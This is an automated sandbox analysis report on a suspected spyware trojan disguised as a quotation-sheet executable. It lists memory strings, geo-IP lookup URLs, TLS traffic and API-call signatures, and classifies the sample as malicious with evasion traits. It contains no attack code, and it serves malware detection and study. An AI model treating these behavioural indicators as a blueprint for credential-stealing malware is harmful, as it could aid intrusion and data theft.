Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034EA7000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034EB2000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E4E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/
Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034EA7000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42929228162.0000000035D43000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034EB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com//
Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034EA7000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42929228162.0000000035D43000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034EB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/https://login.live.com/
Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034EA7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/https://login.live.com/lB
Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034EA7000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42929228162.0000000035D43000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034EB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/v104
Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42917074704.00000000044CA000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38288900779.00000000044C9000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034DBB000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E42000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E0A000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E15000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E37000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E2C000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034D78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/149.18.24.104
Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034DBB000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E42000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E0A000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E15000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E37000.00000004.00000800.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034E2C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/149.18.24.104$
Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034EB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, z1QuotationSheetVSAA6656776.exe, 00000083.00000003.38259026120.00000000044C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown HTTPS traffic detected: 142.251.167.113:443 -> 192.168.11.20:49779 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.251.111.132:443 -> 192.168.11.20:49780 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.177.134:443 -> 192.168.11.20:49782 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 0_2_004051BA GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_004051BA
Too many similar processes found
Source: Conhost.exe Process created: 96

System Summary
barindex
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: z1QuotationSheetVSAA6656776.exe
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 0_2_0040322B EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040322B
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_0040322B EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 131_2_0040322B
Detected potential crypto function
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 0_2_004049F9 0_2_004049F9
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 0_2_004064AE 0_2_004064AE
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_004049F9 131_2_004049F9
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_004064AE 131_2_004064AE
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_0016F01B 131_2_0016F01B
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_0016B0A0 131_2_0016B0A0
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_00166118 131_2_00166118
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_0016C198 131_2_0016C198
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_0016C47B 131_2_0016C47B
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_0016C75F 131_2_0016C75F
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_00166880 131_2_00166880
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_0016990B 131_2_0016990B
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_0016CA38 131_2_0016CA38
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_00164AD8 131_2_00164AD8
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_0016BBD8 131_2_0016BBD8
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_0016CD18 131_2_0016CD18
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_0016BEBB 131_2_0016BEBB
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_0016E530 131_2_0016E530
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_0016E52B 131_2_0016E52B
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_00163578 131_2_00163578
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37847D90 131_2_37847D90
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_378411C0 131_2_378411C0
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_3784B518 131_2_3784B518
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37843870 131_2_37843870
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_378473E8 131_2_378473E8
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_3784F700 131_2_3784F700
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_3784FB49 131_2_3784FB49
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_3784FB58 131_2_3784FB58
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_3784D75A 131_2_3784D75A
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_3784D768 131_2_3784D768
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_3784F29A 131_2_3784F29A
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_3784F2A8 131_2_3784F2A8
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_3784F6F0 131_2_3784F6F0
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_3784EE40 131_2_3784EE40
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_3784EE50 131_2_3784EE50
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_3784E591 131_2_3784E591
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_3784E5A0 131_2_3784E5A0
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_378411B7 131_2_378411B7
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_3784E9E8 131_2_3784E9E8
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_3784E9F8 131_2_3784E9F8
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37840900 131_2_37840900
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_3784E138 131_2_3784E138
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_3784E148 131_2_3784E148
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37840D57 131_2_37840D57
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37840D60 131_2_37840D60
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37840490 131_2_37840490
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_378404A0 131_2_378404A0
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_378484B3 131_2_378484B3
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_378484B8 131_2_378484B8
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_378408F1 131_2_378408F1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_3784003B 131_2_3784003B
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37840040 131_2_37840040
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37843863 131_2_37843863
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B92BB0 131_2_37B92BB0
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B9E990 131_2_37B9E990
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B9EFD8 131_2_37B9EFD8
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B9C3C0 131_2_37B9C3C0
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B93D10 131_2_37B93D10
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B9BD70 131_2_37B9BD70
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B9B168 131_2_37B9B168
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B9E340 131_2_37B9E340
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B9D6A0 131_2_37B9D6A0
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B9DCF0 131_2_37B9DCF0
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B9CA08 131_2_37B9CA08
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B9D050 131_2_37B9D050
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B99BB0 131_2_37B99BB0
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B9C3B0 131_2_37B9C3B0
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B92BAA 131_2_37B92BAA
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B911A0 131_2_37B911A0
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B99BA0 131_2_37B99BA0
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B96F90 131_2_37B96F90
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B9E983 131_2_37B9E983
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B99FF9 131_2_37B99FF9
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B915F8 131_2_37B915F8
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B9C9F8 131_2_37B9C9F8
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B92FFA 131_2_37B92FFA
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B915E8 131_2_37B915E8
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B985D0 131_2_37B985D0
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B9EFC9 131_2_37B9EFC9
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B985C1 131_2_37B985C1
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B90D38 131_2_37B90D38
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B99730 131_2_37B99730
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B99720 131_2_37B99720
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B95F18 131_2_37B95F18
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B9AD10 131_2_37B9AD10
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B95F15 131_2_37B95F15
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B9AD00 131_2_37B9AD00
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B92300 131_2_37B92300
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B98178 131_2_37B98178
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B98169 131_2_37B98169
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B9536A 131_2_37B9536A
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B9BD60 131_2_37B9BD60
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B92758 131_2_37B92758
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B9B15A 131_2_37B9B15A
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B90D48 131_2_37B90D48
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B92748 131_2_37B92748
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B938B8 131_2_37B938B8
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B9A8B8 131_2_37B9A8B8
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B91EA8 131_2_37B91EA8
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B938A8 131_2_37B938A8
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B9A8AA 131_2_37B9A8AA
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B91E99 131_2_37B91E99
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B90498 131_2_37B90498
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B96290 131_2_37B96290
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B9D690 131_2_37B9D690
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B90488 131_2_37B90488
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B98E80 131_2_37B98E80
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B97CF8 131_2_37B97CF8
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B908F0 131_2_37B908F0
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B922F0 131_2_37B922F0
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B97CE8 131_2_37B97CE8
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B9DCE0 131_2_37B9DCE0
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B908E2 131_2_37B908E2
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B992D8 131_2_37B992D8
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B992CA 131_2_37B992CA
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B98A28 131_2_37B98A28
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B98A18 131_2_37B98A18
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B95410 131_2_37B95410
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B9A008 131_2_37B9A008
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B93008 131_2_37B93008
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B90006 131_2_37B90006
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B98E70 131_2_37B98E70
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B9A460 131_2_37B9A460
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B93460 131_2_37B93460
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B91A50 131_2_37B91A50
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B93450 131_2_37B93450
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B9A450 131_2_37B9A450
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B91A40 131_2_37B91A40
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B90040 131_2_37B90040
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37B9D040 131_2_37B9D040
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37DD5C98 131_2_37DD5C98
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37DEF378 131_2_37DEF378
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_37DEC57C 131_2_37DEC57C
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: String function: 00402A3A appears 52 times
PE / OLE file has an invalid certificate
Source: z1QuotationSheetVSAA6656776.exe Static PE information: invalid certificate
Sample file is different than original file name gathered from version info
Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927175807.0000000034B27000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs z1QuotationSheetVSAA6656776.exe
Uses 32bit PE files
Source: z1QuotationSheetVSAA6656776.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@408/13@4/4
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 0_2_0040322B EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040322B
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 131_2_0040322B EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 131_2_0040322B
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 0_2_00404486 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_00404486
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Code function: 0_2_0040205E CoCreateInstance,MultiByteToWideChar, 0_2_0040205E
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Mutant created: NULL
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe File created: C:\Users\user\AppData\Local\Temp\nsa9B22.tmp Jump to behavior
Source: z1QuotationSheetVSAA6656776.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: z1QuotationSheetVSAA6656776.exe ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe File read: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Jump to behavior
